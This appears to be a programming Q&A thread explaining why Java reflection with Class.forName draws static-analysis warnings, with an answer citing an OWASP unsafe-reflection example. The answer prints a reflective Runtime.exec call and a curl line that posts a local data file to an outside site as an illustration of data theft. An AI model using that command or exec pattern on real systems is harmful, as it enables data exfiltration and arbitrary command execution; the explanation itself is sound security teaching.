# Dyanamic class load for server side application

Tags: java, server, reflection, object-injection, memory-management

Is there a problem to use reflection (specifically class.forName) in server side application?

My main thread about this is someone to inject a code dumping memory in JVM and adding commands in reference memory field, but this is unlike in server side (and if server side was compromised this will be a minor problem).

Btw, I am asking because static analises keep acusing as a vulnerabiliy

Answer (score 1):

Reflection, and `Class.forName` in particular, can enable execution of arbitrary code.

**Example 1: Malicious developer**

```
    Class runtimeClass = Class.forName("java.lang.Runtime");
    Object runtime = runtimeClass.getMethod("getRuntime").invoke(runtimeClass);
    clazz.getMethod("exec", String.class).invoke(runtime, "calc.exe");
```

Instead of `calc.exe` it can be for instance some command that destroys something important on your server, or installs a virus, or steals your data like

```
curl -d "@data.txt" -X POST https://your.site.com/data
```

Even if you make sure the word "Runtime" is not used in the code, it can be created dynamically. Thus you cannot guarantee that Runtime class is  not used in the reflection code.

**Example 2: Honest developer**

There can be security problems even if such code is implemented by a honest developer. For instance, you want to simplify the code and build some class or method name dynamically depending on user request, and then execute it. See [an OWASP example](https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflection):

```
    String ctl = request.getParameter("ctl");
    Class cmdClass = Class.forName(ctl + "Command");
    Worker ao = (Worker) cmdClass.newInstance();
    ao.doAction(request);
```

In this case malicious user can trigger some method even without having permissions required by business logic.

The goal of static analysis tools is to show you the places in the code that can *potentially* lead to security problems. You decide if particular case means any risk for you or not.